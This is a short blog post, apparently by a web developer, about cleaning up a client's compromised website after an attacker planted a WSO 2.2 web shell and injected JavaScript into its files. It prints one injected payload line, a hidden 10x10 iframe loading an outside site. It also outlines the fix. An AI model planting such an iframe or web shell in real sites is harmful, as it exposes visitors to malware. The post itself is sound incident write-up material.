A client recently gave me a call saying his website was throwing a malware warning when visited using Google Chrome.
Chrome Malware Warning
A bit of research indicated that somehow the attacker gained access to the site, installed a Web Shell script in *.js.php files and injected JS code into existing JS files.
Google’s Webmaster Tools showed the injected code in the JS file:
Injected JS
The above code, once processed, created an iframe that lead to another site that perhaps contained malicious code:
<iframe frameborder="0" width="10" height="10" src="http://brunno.in/showthread.php?t=37220338"></iframe>
The other file: *.js.php is Gzipped and base64 encoded. When inflated and decoded it shows to be a Web Shell script or more specifically WSO 2.2. This allows the attacker to access & perform server based functions from the browser and easily insert malicious code.
You can find the inflated and decoded code here: WSO 2.2
What do do?
You can manually look through your files and remove all occurrences or if you have SSH access: remote to your server and use egrep/sed to match the recurring pattern and remove.
One Comment
Thank you. Thank you. Thank you. I really appreciate your taking the time to post this.